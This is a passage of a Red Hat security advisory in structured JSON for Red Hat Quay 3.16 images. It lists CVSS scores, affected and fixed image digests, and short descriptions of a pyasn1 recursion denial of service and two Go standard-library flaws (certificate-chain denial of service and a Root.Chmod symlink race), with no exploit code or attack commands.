            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
    },
    {
      "cve": "CVE-2026-32280",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-08T02:01:19.572351+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456339"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456339",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758320",
          "url": "https://go.dev/cl/758320"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78282",
          "url": "https://go.dev/issue/78282"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4947",
          "url": "https://pkg.go.dev/vuln/GO-2026-4947"
        }
      ],
      "release_date": "2026-04-08T01:06:58.595000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
    },
    {
      "cve": "CVE-2026-32282",
      "cwe": {
        "id": "CWE-367",
        "name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
      },
      "discovery_date": "2026-04-08T02:01:12.683211+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456336"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs access to the system and the required permissions to create a symbolic link. Additionally, the attacker must swap the target file with a symbolic link in the exact window after the `Root.Chmod` function checks its target but before acting. Due to these conditions, this flaw has been rated with a moderate severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
